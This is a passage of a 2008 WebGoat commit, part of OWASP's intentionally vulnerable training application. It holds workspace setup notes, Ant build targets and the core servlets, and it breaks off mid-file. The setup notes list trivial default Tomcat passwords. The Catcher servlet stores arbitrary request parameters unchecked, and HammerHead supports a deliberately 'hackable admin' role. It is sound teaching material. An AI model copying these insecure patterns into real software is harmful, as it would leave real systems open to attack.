commit b0b94c4688ba5af591c6120aa44902e72561e372
Author: rogan.dawes <rogan.dawes@4033779f-a91e-0410-96ef-6bf7bf53c507>
Date:   Mon Jan 14 14:02:11 2008 +0000

    Miscellaneous bug fixes
    
    divide by zero, inaccurate discount and totals, reflection of user input
    
    
    git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@273 4033779f-a91e-0410-96ef-6bf7bf53c507

diff --git a/main/Eclipse-Workspace.zip b/main/Eclipse-Workspace.zip
new file mode 100644
index 000000000..8205dca87
Binary files /dev/null and b/main/Eclipse-Workspace.zip differ
diff --git a/main/HOW TO create the WebGoat workspace.txt b/main/HOW TO create the WebGoat workspace.txt
new file mode 100644
index 000000000..ba01dd1e9
--- /dev/null
+++ b/main/HOW TO create the WebGoat workspace.txt	
@@ -0,0 +1,196 @@
+***************************************
+
+As of 5.1 the developer release contains the eclipse workspace
+and project files. 
+
+Extract distribution to c:\  
+   - It will create a WebGoat-x.x directory
+Extract Eclipse-Workspace.zip to C:\WebGoat-x.x
+Start eclipse using eclipse.bat
+After eclipse starts
+    Top left - Project Explorer view
+        right click WebGoat – refresh
+        right click Servers – refresh
+    Bottom - Servers view
+        right click Tomcat… - start
+Browse to http://localhost/WebGoat/attack
+
+
+You're done.  Changing files in eclipse will automatically rebuild
+and redeploy the application.
+
+Follow the instructions below to build the workspace from scratch
+
+
+***************************************
+
+
+
+
+
+***************************************
+
+Eclipse startup and dependency removal
+WebGoat uses Eclipse WTP 1.5
+
+***************************************
+
+Change paths in eclipse.bat to reflect your environment
+
+    edit <webgoat-root>/eclipse.bat
+        Change JAVAHOME to directory where java is installed.
+        ex: This may be .\java or "C:\Program Files\Java\jdk1.5.0_08"
+
+        Change ECLIPSE_HOME to directory where eclipse is installed
+        ex: This may be .\eclipse or "C:\Program Files\eclipse"
+        Note: WebGoat requires eclipse with WTP project
+
+
+Run eclipse using the eclipse.bat file
+
+   located at <webgoat-root>/eclipse.bat
+
+Remove eclipse dependencies
+
+   Delete all files and directories beginning
+   with a period. ex) .settings, .project, etc...
+   Note: These files probably do not exist unless you have
+         previously tried to build a WebGoat eclipse project
+
+
+Eclipse will start up in the default state
+Click arrow at top right to load the eclipse workbench
+
+
+***************************************
+
+Verify tomcat directory is read/write access
+
+***************************************
+
+You may have to install Tomcat and merge the webgoat users into
+the tomcat-users.xml file
+
+File: <tomcat-root>/conf/tomcat-users.xml
+
+<tomcat-users>
+  <role rolename="webgoat_admin"/>
+  <role rolename="webgoat_basic"/>
+  <role rolename="webgoat_user"/>
+  <user username="webgoat" password="webgoat" roles="webgoat_admin"/>
+  <user username="basic" password="basic" roles="webgoat_user,webgoat_basic"/>
+  <user username="guest" password="guest" roles="webgoat_user"/>
+</tomcat-users>
+
+
+
+***************************************
+
+Initial Setup of Development Enviroment
+
+***************************************
+
+Step 1) Add the WebGoat JDK
+
+window->preferences->
+    java->installed JREs
+
+    add
+        Name: WebGoat JDK 1.5
+        Directory: java
+    OK
+
+    select new JDK as default
+    remove previous JDK if exists
+    OK
+
+window->preferences
+    server->Installed Runtime
+
+    ADD
+        apache
+            tomcat v5.5
+        NEXT
+        directory: use browse button to locate <webgoat-root>/tomcat (e.g. C:\P4\BUILD\depot\WebGoat\J2EE\main\tomcat)
+        JRE: WebGoat JDK 1.5
+        FINISH
+        select apache tomcat v5.5 as default
+        OK
+
+window->open perspective
+    other
+        J2EE
+
+in Project Explorer
+    right click->New->New Dynamic Web Project
+    
+    Name: WebGoat
+    Deselect "use default"
+    Browse to <webgoat-root>/project (e.g. C:\P4\BUILD\depot\WebGoat\J2EE\main\project)
+    NEXT
+    NEXT
+    change Java Source Directory: JavaSource
+    FINISH
+    Click "I Agree" if dialog appears (will appear after build completes)
+
+From "Servers" View - Should be in bottom view
+    right click->New->Server (Tomcat 5.5 should be default selected)
+    NEXT
+    select WebGoat
+    ADD
+    FINISH
+
+From a Windows file explorer window
+    Copy the <tomcat_root>.keystore to eclipse workspace directory
+    <WebGoat_Root>\J2EE\main\workspace\.metadata\.plugins\org.eclipse.wst.server.core\tmp0\.keystore
+
+From Servers view
+
+    double click Tomcat v 5.5 Server @ locahost
+
+in "Server Overview" window
+
+    Uncheck "Run modules directly from the workspace"
+    SAVE (ctrl-s)
+    NOTE: In developer mode you may want to leave this checked
+
+
+
+Right click on Tomcat v5.5 Sever@localhost ->Start
+
+Browse to http://localhost/WebGoat/attack
+
+
+***************************************
+
+Deploying to Tomcat
+
+***************************************
+
+From Servers view
+
+    double click Tomcat v 5.5 Server @ locahost
+
+in "Server Overview" window
+
+    Uncheck "Run modules directly from the workspace"
+    SAVE (ctrl-s)
+
+From Servers view
+
+    right click->Publish
+
+Using file system
+    copy JavaSource directory into <tomcat-root>/webapps/WebGoat/
+
+
+***************************************
+
+Configuring Webgoat.properties for
+your environment.
+    i.e. How to manage the menus
+
+***************************************
+
+Edit <webgoat-root>/project/WebContent/WEB-INF/webgoat.properties
+  - Turn off/on the desired lessons
diff --git a/main/build.xml b/main/build.xml
new file mode 100644
index 000000000..52c34732a
--- /dev/null
+++ b/main/build.xml
@@ -0,0 +1,282 @@
+<!-- A "project" describes a set of targets that may be requested
+     when Ant is executed.  The "default" attribute defines the
+     target which is executed if no specific target is requested,
+     and the "basedir" attribute defines the current working directory
+     from which Ant executes the requested task.  This is normally
+     set to the current working directory.
+-->
+
+<project name="WebGoat" default="Build_ALL_OWASP_Releases" basedir=".">
+
+<!-- ===================== Property Definitions =========================== -->
+
+<!--
+  Each of the following properties are used in the build script.
+  Values for these properties are set by the first place they are
+  defined, from the following list:
+
+  * Definitions on the "ant" command line (ant -Dfoo=bar compile).
+  * Definitions from a "build.properties" file in the top level
+    source directory of this application.
+  * Definitions from a "build.properties" file in the developer's
+    home directory.
+  * Default definitions in this build.xml file.
+  You will note below that property values can be composed based on the
+  contents of previously defined properties.  This is a powerful technique
+  that helps you minimize the number of changes required when your development
+  environment is modified.  Note that property composition is allowed within
+  "build.properties" files as well as in the "build.xml" script.
+-->
+
+  <property file="build.properties"/>
+  <property file="${user.home}/build.properties"/>
+
+<!-- ==================== File and Directory Names ======================== -->
+
+<!--
+  These properties generally define file and directory names (or paths) that
+  affect where the build process stores its outputs.
+
+  build.home           The directory into which the "prepare" and
+                       "compile" targets will generate their output.
+                       Defaults to "build".
+
+  catalina.home        The directory in which you have installed
+                       a binary distribution of Tomcat 4.  This will
+                       be used by the "deploy" target.
+
+  dist.home            The name of the base directory in which
+                       distribution files are created.
+                       Defaults to "dist".
+
+  install.home         The absolute path of the directory into which
+			     the installer will copy its files.  The Eclipse
+			     project is bound to this path.
+-->
+
+  <property name="app.home"    		   value="${basedir}/project"/>
+  <property name="app.name"    		   value="WebGoat"/>	<!-- MUST BE CONSISTENT WITH project/build.xml! -->
+  <property name="app.version"    		   value="5.1"/>		<!-- MUST BE CONSISTENT WITH project/build.xml! -->
+  <property name="catalina.home" 		   value="${basedir}/tomcat"/>
+  <property name="dist.home"     		   value="${app.home}/dist"/>
+  <property name="dist.owasp"     		   value="${app.home}/owasp_distributions"/>
+  <property name="install.home"     	   value="WebGoat-${app.version}"/>
+
+<!-- ==================== Clean Target ==================================== -->
+
+<!--
+  The "clean" target deletes any previous "build" and "dist" directory,
+  so that you can be ensured the application can be built from scratch.
+-->
+
+  <target name="clean"
+   description="Delete old build and dist directories">
+    <delete file="${web_inf.home}/web.xml"/>
+ 	<delete dir="${dist.home}"/>
+	<delete dir="${catalina.home}/logs"/>
+	<delete dir="${catalina.home}/work/Catalina/localhost"/>
+ 	<delete dir="${catalina.home}/webapps/${app.name}"/>
+	<delete file="${catalina.home}/webapps/${app.name}.war"/>
+	<delete dir="${catalina.home}/server/webapps/${app.name}"/>
+    <mkdir dir="${dist.home}"/>
+ 	<mkdir dir="${catalina.home}/logs"/>
+ </target>
+
+  <target name="clean_all"
+   description="Delete old build, dist directories and zips">
+ 	<delete dir="${dist.home}"/>
+ 	<delete dir="${dist.owasp}"/>
+ 	<mkdir dir="${dist.home}"/>
+ 	<mkdir dir="${dist.owasp}"/>
+  </target>
+
+<!-- ==================== Compile Target ===================================== -->
+	
+  <target name="compile" depends="Compile-WebGoat"
+	description="Build all dependency applications">
+  </target>
+
+  <target name="Compile-WebGoat"
+	description="Build the WebGoat application">
+		<ant dir="${app.home}" target="BuildWar" inheritAll="false"/>
+  </target>
+
+<!--
+  <target name="DELETE_ME_Compile-WebGoat-Unix"
+	description="Build the WebGoat application">
+		<ant dir="${app.home}" target="BuildUnixWar" inheritAll="false"/>
+  </target>
+-->
+	
+  <target name="Compile-WebGoat-LAB"
+	description="Build the WebGoat application">
+		<ant dir="${app.home}" inheritAll="false">
+			<target name="-WebGoatPropertiesLAB"/>
+			<target name="BuildWar"/>
+		</ant>
+  </target>
+
+  <target name="Compile-WebGoat-Class"
+	description="Build the WebGoat application">
+		<ant dir="${app.home}" inheritAll="false">
+			<target name="-WebGoatPropertiesClass"/>
+			<target name="BuildWar"/>
+		</ant>
+  </target>
+
+  <target name="Compile-WebGoat-OWASP"
+	description="Build the WebGoat application">
+		<ant dir="${app.home}" inheritAll="false">
+			<target name="-WebGoatPropertiesOWASP"/>
+			<target name="BuildWar"/>
+		</ant>
+  </target>
+
+<!-- ==================== Dist Target ===================================== -->
+
+<!--
+  The "dist" target creates a binary distribution of your application
+  in a directory structure ready to be archived in a tar.gz or zip file.
+  Note that this target depends on two others:
+
+  * "compile" so that the entire web application (including external
+    dependencies) will have been assembled
+-->
+
+  
+  <target name="ZipProject"
+   	description="Create a zip archive of all Eclipse project files from C:\WebGoatClassCD">
+
+		<!-- Put a copy of the keystore into the WTP dynamic deployment area -->
+		<copy file="/WebGoatClassCD/tomcat/.keystore" tofile="/WebGoatClassCD/workspace/.metadata/.plugins/org.eclipse.wst.server.core/tmp0/.keystore"/>
+
+		<zip destfile="${basedir}/project-student.zip"
+			basedir="/WebGoatClassCD"	
+		   	includes="project/.project, project/.classpath, project/.settings/**, workspace/**"/>		
+  </target> 
+
+
+  <target name="DeployWar" 
+   	description="Copy existing war to Tomcat - Does not rebuild">
+
+    <!-- Install war to Tomcat -->
+    <delete dir="${catalina.home}/webapps/${app.name}"/>
+    <delete file="${catalina.home}/webapps/${app.name}.war"/>
+    <copy file="${app.home}/dist/${app.name}-${app.version}.war" tofile="${catalina.home}/webapps/${app.name}.war"/>
+	 
+  </target> 
+	
+
+	<!--Build patch release -->
+	<target name="BuildPatch_release" depends="clean, compile"
+	   description="Creates patch release of class files for WebGoat"> 
+		<zip destfile="${dist.home}/${app.name}-${app.version}_patch.zip">
+	    		<zipfileset dir="build/WEB-INF/classes" prefix="WEB-INF/classes"/>
+			<zipfileset dir="." includes="readme_patch.txt"/>
+		</zip>
+	</target>
+	
+	<!-- Build J2EE Lab Environment release -->
+	<target name="Build_DeveloperLab_Release" depends="clean"
+			description="Builds J2EE Developer Course release">
+
+		<!-- Build the WebGoat WAR with the desired properties file -->
+		<ant dir="${app.home}" inheritAll="false">
+			<target name="WebGoatPropertiesOWASP"/>
+			<target name="BuildWar"/>
+		</ant>
+
+		<antcall target="DeployWar"> </antcall> 
+
+		<!-- Build the CD image -->
+		<zip destfile="${dist.home}/${ant.project.name}-DeveloperLab-${app.version}.zip">
+			<zipfileset dir="." prefix="${install.home}"
+				includes="eclipse/, java/, project/, FirefoxPortable/, Paros/, tomcat/, webscarab/, 
+				          Read*.txt, HOW*.txt, eclipse.bat, webgoat.bat, webgoat_8080.bat, webscarab.bat,
+						  Eclipse-Workspace.zip"
+				excludes="project/.*, project/.settings/**, project/dist/**, project/owasp_distributions/**, project/bin/**, project/build/**"/>
+		</zip>
+	</target> 	
+	
+	<target name="Build_Class_Release" depends="clean"
+			description="Builds WebGoat Course release">
+
+		<!-- Build the WebGoat WAR with the desired properties file -->
+		<ant dir="${app.home}" inheritAll="false">
+			<target name="WebGoatPropertiesOWASP"/>
+			<target name="BuildWar"/>
+		</ant>
+
+		<antcall target="DeployWar"> </antcall> 
+
+		<!-- Build the CD image -->
+		<zip destfile="${dist.home}/${ant.project.name}-Class-${app.version}.zip">
+			<zipfileset dir="." prefix="${install.home}"
+				includes="java/, tomcat/, FirefoxPortable/, Paros/, webscarab/, webgoat.bat, webgoat_8080.bat, webscarab.bat"
+				excludes="project/.*, project/.settings/**, project/dist/**, project/owasp_distributions/**, project/bin/**, project/build/**"/>
+		</zip>
+	</target> 	
+
+	<!-- Build OWASP Developer Lab Environment release -->
+	<target name="Build_OWASP_DeveloperLab_release" depends="clean"
+			description="Builds OWASP Developer release">
+		<!-- Build the WebGoat WAR with the desired properties file -->
+		<ant dir="${app.home}" inheritAll="false">
+			<target name="WebGoatPropertiesOWASP"/>
+			<target name="BuildWar"/>
+		</ant>
+		<antcall target="DeployWar"> </antcall> 
+		<!-- Build the CD image -->
+		<zip destfile="${dist.home}/${ant.project.name}-OWASP_Developer-${app.version}.zip">
+			<zipfileset dir="." prefix="${install.home}"
+				includes="eclipse/, java/, project/, tomcat/, 
+				          read*.txt, HOW*.txt, eclipse.bat, webgoat.bat, webgoat_8080.bat,
+						  Eclipse-Workspace.zip"
+				excludes="project/.*, project/.settings/**, project/dist/**, project/owasp_distributions/**, project/bin/**, project/build/**"/>
+		</zip>
+	</target> 	
+
+	<target name="Build_OWASP_Standard_Release" depends="clean"
+			description="Builds WebGoat OWASP release">
+		<!-- Build the WebGoat WAR with the desired properties file -->
+		<ant dir="${app.home}" inheritAll="false">
+			<target name="WebGoatPropertiesOWASP"/>
+			<target name="BuildWar"/>
+		</ant>
+		<antcall target="DeployWar"> </antcall> 
+		<!-- Build the CD image -->
+		<zip destfile="${dist.home}/${ant.project.name}-OWASP_Standard-${app.version}.zip">
+			<zipfileset dir="." prefix="${install.home}"
+				includes="java/, tomcat/, read*.txt, webgoat.bat, webgoat_8080.bat"
+				excludes="project/.*, project/.settings/**, project/dist/**, project/owasp_distributions/**, project/bin/**, project/build/**"/>
+		</zip>
+	</target> 	
+
+	<!--Build all OWASP release -->
+	<target name="Build_ALL_OWASP_Releases" depends="clean_all"
+		   description="Creates all binary distributions for OWASP">
+		<copy file="${basedir}/readme.txt" tofile="${dist.owasp}/readme.txt"/>
+		<antcall target="Build_OWASP_Standard_Release"> </antcall>
+		<copydir dest="${dist.owasp}" src="${dist.home}"/>
+		<antcall target="Build_OWASP_DeveloperLab_release"> </antcall> 
+		<copydir dest="${dist.owasp}" src="${dist.home}"/>
+	</target> 
+
+	
+<!-- ==================== Prepare Target ================================== -->
+
+<!--
+  The "prepare" target is used to create the "build" destination directory,
+  and copy the static contents of your web application to it.  If you need
+  to copy static files from external dependencies, you can customize the
+  contents of this task.
+
+  Normally, this task is executed indirectly when needed.
+-->
+
+	<target name="prepare">
+	</target>
+	
+</project>
+
+
diff --git a/main/eclipse.bat b/main/eclipse.bat
new file mode 100644
index 000000000..876f5f7c3
--- /dev/null
+++ b/main/eclipse.bat
@@ -0,0 +1,28 @@
+ECHO OFF
+IF NOT EXIST workspace GOTO UNPACK
+set JAVAHOME=java
+set PATH=%JAVAHOME%\bin;%PATH%
+set ECLIPSE_HOME=eclipse
+SET JAVA_OPTS=%JAVA_OPTS% -Xms128m -Xmx768m
+
+%ECLIPSE_HOME%\eclipse.exe -data .\workspace
+GOTO END
+
+:UNPACK
+ECHO *
+ECHO *
+ECHO *
+ECHO *
+ECHO *   ERROR -- eclipse workspace is missing
+ECHO *
+ECHO *
+ECHO *
+ECHO *
+ECHO *   Use winzip to unzip Eclipse-Workspace.zip
+ECHO *
+ECHO *
+ECHO *
+PAUSE
+
+:END
+
diff --git a/main/project/JavaSource/org/owasp/webgoat/Catcher.java b/main/project/JavaSource/org/owasp/webgoat/Catcher.java
new file mode 100644
index 000000000..fdba04082
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/Catcher.java
@@ -0,0 +1,121 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.util.Enumeration;
+
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.session.Course;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    March 13, 2007
+ */
+public class Catcher extends HammerHead
+{
+
+    /**
+	 * 
+	 */
+	private static final long serialVersionUID = 7441856110845727651L;
+
+	/**
+     *  Description of the Field
+     */
+    public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE";
+
+    public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE";
+
+    public static final String PROPERTY = "PROPERTY";
+
+    public static final String EMPTY_STRING = "";
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  request               Description of the Parameter
+     * @param  response              Description of the Parameter
+     * @exception  IOException       Description of the Exception
+     * @exception  ServletException  Description of the Exception
+     */
+    public void doPost(HttpServletRequest request, HttpServletResponse response)
+	    throws IOException, ServletException
+    {
+		try
+		{
+		    //System.out.println( "Entering doPost: " );
+		    //System.out.println( "	- request "   + request);
+		    //System.out.println( "	- principle: "   + request.getUserPrincipal() );
+		    //setCacheHeaders(response, 0);
+		    WebSession session = (WebSession) request.getSession(true)
+			    .getAttribute(WebSession.SESSION);
+		    session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
+	
+		    int scr = session.getCurrentScreen();
+		    Course course = session.getCourse();
+		    AbstractLesson lesson = course.getLesson(session, scr,
+			    AbstractLesson.USER_ROLE);
+
+		    log(request, lesson.getClass().getName() + " | "
+				    + session.getParser().toString());
+		    
+		    String property = new String(session.getParser().getStringParameter(
+				    PROPERTY, EMPTY_STRING));
+		    
+		    // if the PROPERTY parameter is available - write all the parameters to the 
+		    // property file.  No other control parameters are supported at this time.
+		    if ( !property.equals(EMPTY_STRING))
+		    {
+		    	Enumeration e = session.getParser().getParameterNames();
+
+		    	while (e.hasMoreElements())
+		    	{
+		    	    String name = (String) e.nextElement();
+		    	    String value= session.getParser().getParameterValues(name)[0];
+				    lesson.getLessonTracker(session).getLessonProperties().setProperty(
+						    name, value);
+		    	}
+		    }	    
+		    lesson.getLessonTracker(session).store(session, lesson);
+		    
+		}
+		catch (Throwable t)
+		{
+		    t.printStackTrace();
+		    log("ERROR: " + t);
+		}
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/HammerHead.java b/main/project/JavaSource/org/owasp/webgoat/HammerHead.java
new file mode 100644
index 000000000..0e3f8d6a9
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/HammerHead.java
@@ -0,0 +1,510 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.io.PrintWriter;
+import java.text.SimpleDateFormat;
+import java.util.Date;
+import java.util.Locale;
+import java.util.TimeZone;
+
+import javax.servlet.ServletContext;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import javax.servlet.http.HttpSession;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.lessons.WelcomeScreen;
+import org.owasp.webgoat.lessons.admin.WelcomeAdminScreen;
+import org.owasp.webgoat.session.Course;
+import org.owasp.webgoat.session.ErrorScreen;
+import org.owasp.webgoat.session.Screen;
+import org.owasp.webgoat.session.UserTracker;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.session.WebgoatContext;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public class HammerHead extends HttpServlet
+{
+
+    /**
+	 * 
+	 */
+	private static final long serialVersionUID = 645640331343188020L;
+
+	/**
+     * Description of the Field
+     */
+    protected static SimpleDateFormat httpDateFormat;
+
+    /**
+     * Set the session timeout to be 2 days
+     */
+    private final static int sessionTimeoutSeconds = 60 * 60 * 24 * 2;
+
+    // private final static int sessionTimeoutSeconds = 1;
+
+    /**
+     * Properties file path
+     */
+    public static String propertiesPath = null;
+
+    /**
+     * provides convenience methods for getting setup information 
+     * from the ServletContext
+     */
+    private WebgoatContext webgoatContext = null;
+    
+
+    /**
+     * Description of the Method
+     * 
+     * @param request
+     *        Description of the Parameter
+     * @param response
+     *        Description of the Parameter
+     * @exception IOException
+     *            Description of the Exception
+     * @exception ServletException
+     *            Description of the Exception
+     */
+    public void doGet(HttpServletRequest request, HttpServletResponse response)
+	    throws IOException, ServletException
+    {
+	doPost(request, response);
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param request
+     *        Description of the Parameter
+     * @param response
+     *        Description of the Parameter
+     * @exception IOException
+     *            Description of the Exception
+     * @exception ServletException
+     *            Description of the Exception
+     */
+    public void doPost(HttpServletRequest request, HttpServletResponse response)
+	    throws IOException, ServletException
+    {
+	Screen screen = null;
+
+	WebSession mySession = null;
+	try
+	{
+	    // System.out.println( "HH Entering doPost: " );
+	    // System.out.println( " - HH request " + request);
+	    // System.out.println( " - HH principle: " +
+	    // request.getUserPrincipal() );
+	    // setCacheHeaders(response, 0);
+	    ServletContext context = getServletContext();
+
+	    // FIXME: If a response is written by updateSession(), do not
+	    // call makeScreen() and writeScreen()
+	    mySession = updateSession(request, response, context);
+	    if (response.isCommitted())
+		return;
+
+	    // Note: For the lesson to track the status, we need to update
+	    // the lesson tracker object
+	    // from the screen.createContent() method. The create content is
+	    // the only point
+	    // where the lesson "knows" what has happened. To track it at a
+	    // latter point would
+	    // require the lesson to have memory.
+	    screen = makeScreen(mySession); // This calls the lesson's
+	    // handleRequest()
+	    if (response.isCommitted())
+		return;
+
+	    // perform lesson-specific tracking activities
+	    if (screen instanceof AbstractLesson) {
+	    	AbstractLesson lesson = (AbstractLesson) screen;
+	    	
+		    // we do not count the initial display of the lesson screen as a visit
+		    if ("GET".equals(request.getMethod())) {
+		    	String uri = request.getRequestURI() + "?" + request.getQueryString();
+		    	if (! uri.endsWith(lesson.getLink()))
+		    		screen.getLessonTracker(mySession).incrementNumVisits();
+		    } else if ("POST".equals(request.getMethod()) && mySession.getPreviousScreen() == mySession.getCurrentScreen()) {
+			    screen.getLessonTracker(mySession).incrementNumVisits();
+		    }
+	    }
+
+	    // log the access to this screen for this user
+	    UserTracker userTracker = UserTracker.instance();
+	    userTracker.update(mySession, screen);
+	    log(request, screen.getClass().getName() + " | "
+		    + mySession.getParser().toString());
+
+	    // Redirect the request to our View servlet
+	    String userAgent = request.getHeader("user-agent");
+	    String clientBrowser = "Not known!";
+	    if (userAgent != null)
+	    {
+		clientBrowser = userAgent;
+	    }
+	    request.setAttribute("client.browser", clientBrowser);
+	    request.getSession().setAttribute("websession", mySession);
+	    request.getSession().setAttribute("course", mySession.getCourse());
+
+	    request.getRequestDispatcher(getViewPage(mySession)).forward(
+		    request, response);
+	}
+	catch (Throwable t)
+	{
+	    t.printStackTrace();
+	    log("ERROR: " + t);
+	    screen = new ErrorScreen(mySession, t);
+	}
+	finally
+	{
+	    try
+	    {
+		this.writeScreen(mySession, screen, response);
+	    }
+	    catch (Throwable thr)
+	    {
+		thr.printStackTrace();
+		log(request, "Could not write error screen: "
+			+ thr.getMessage());
+	    }
+    	WebSession.returnConnection(mySession);
+	    // System.out.println( "HH Leaving doPost: " );
+	}
+    }
+
+
+    private String getViewPage(WebSession webSession)
+    {
+	String page;
+
+	// If this session has not seen the landing page yet, go there instead.
+	HttpSession session = webSession.getRequest().getSession();
+	if (session.getAttribute("welcomed") == null)
+	{
+	    session.setAttribute("welcomed", "true");
+	    page = "/webgoat.jsp";
+	}
+	else
+	    page = "/main.jsp";
+
+	return page;
+    }
+
+    /**
+     * Description of the Method
+     * 
+     * @param date
+     *        Description of the Parameter
+     * @return RFC 1123 http date format
+     */
+    protected static String formatHttpDate(Date date)
+    {
+	synchronized (httpDateFormat)
+	{
+	    return httpDateFormat.format(date);
+	}
+    }
+
+
+    /**
+     * Return information about this servlet
+     * 
+     * @return The servletInfo value
+     */
+    public String getServletInfo()
+    {
+	return "WebGoat is sponsored by Aspect Security.";
+    }
+
+
+    /**
+     * Return properties path
+     * 
+     * @return servlet context path + WEB_INF
+     */
+    public void init() throws ServletException
+    {
+	httpDateFormat = new SimpleDateFormat("EEE, dd MMM yyyyy HH:mm:ss z",
+		Locale.US);
+	httpDateFormat.setTimeZone(TimeZone.getTimeZone("GMT"));
+	propertiesPath = getServletContext().getRealPath(
+		"./WEB-INF/webgoat.properties");
+	webgoatContext = new WebgoatContext(this);
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param request
+     *        Description of the Parameter
+     * @param message
+     *        Description of the Parameter
+     */
+    public void log(HttpServletRequest request, String message)
+    {
+	String output = new Date() + " | " + request.getRemoteHost() + ":"
+		+ request.getRemoteAddr() + " | " + message;
+	log(output);
+	System.out.println(output);
+    }
+
+    /*
+     * public List getLessons(Category category, String role) { Course
+     * course = mySession.getCourse(); // May need to clone the List before
+     * returning it. //return new ArrayList(course.getLessons(category,
+     * role)); return course.getLessons(category, role); }
+     */
+
+    /**
+     * Description of the Method
+     * 
+     * @param s
+     *        Description of the Parameter
+     * @return Description of the Return Value
+     */
+    protected Screen makeScreen(WebSession s)
+    {
+	Screen screen = null;
+	int scr = s.getCurrentScreen();
+	Course course = s.getCourse();
+
+	if (s.isUser() || s.isChallenge())
+	{
+	    if (scr == WebSession.WELCOME)
+	    {
+		screen = new WelcomeScreen(s);
+	    }
+	    else
+	    {
+		AbstractLesson lesson = course.getLesson(s, scr,
+			AbstractLesson.USER_ROLE);
+		if (lesson == null && s.isHackedAdmin())
+		{
+		    // If admin was hacked, let the user see some of the
+		    // admin screens
+		    lesson = course.getLesson(s, scr,
+			    AbstractLesson.HACKED_ADMIN_ROLE);
+		}
+
+		if (lesson != null)
+		{
+		    screen = lesson;
+
+		    // We need to do some bookkeeping for the hackable admin
+		    // interface.
+		    // This is the only place we can tell if the user
+		    // successfully hacked the hackable
+		    // admin and has actually accessed an admin screen. You
+		    // need BOTH pieces of information
+		    // in order to satisfy the remote admin lesson.
+
+		    s.setHasHackableAdmin(screen.getRole());
+
+		    lesson.handleRequest(s);
+		    s.setCurrentMenu(lesson.getCategory().getRanking());
+		}
+		else
+		{
+		    screen = new ErrorScreen(s,
+			    "Invalid screen requested.  Try: http://localhost/WebGoat/attack");
+		}
+	    }
+	}
+	else if (s.isAdmin())
+	{
+	    if (scr == WebSession.WELCOME)
+	    {
+		screen = new WelcomeAdminScreen(s);
+	    }
+	    else
+	    {
+		// Admin can see all roles.
+		// FIXME: should be able to pass a list of roles.
+		AbstractLesson lesson = course.getLesson(s, scr,
+			AbstractLesson.ADMIN_ROLE);
+		if (lesson == null)
+		{
+		    lesson = course.getLesson(s, scr,
+			    AbstractLesson.HACKED_ADMIN_ROLE);
+		}
+		if (lesson == null)
+		{
+		    lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE);
+		}
+
+		if (lesson != null)
+		{
+		    screen = lesson;
+
+		    // We need to do some bookkeeping for the hackable admin
+		    // interface.
+		    // This is the only place we can tell if the user
+		    // successfully hacked the hackable
+		    // admin and has actually accessed an admin screen. You
+		    // need BOTH pieces of information
+		    // in order to satisfy the remote admin lesson.
+
+		    s.setHasHackableAdmin(screen.getRole());
+
+		    lesson.handleRequest(s);
+		    s.setCurrentMenu(lesson.getCategory().getRanking());
+		}
+		else
+		{
+		    screen = new ErrorScreen(
+			    s,
+			    "Invalid screen requested.  Try Setting Admin to false or Try: http://localhost/WebGoat/attack");
+		}
+	    }
+	}
+
+	return (screen);
+    }
+
+
+    /**
+     * This method sets the required expiration headers in the response for
+     * a given RunData object. This method attempts to set all relevant
+     * headers, both for HTTP 1.0 and HTTP 1.1.
+     * 
+     * @param response
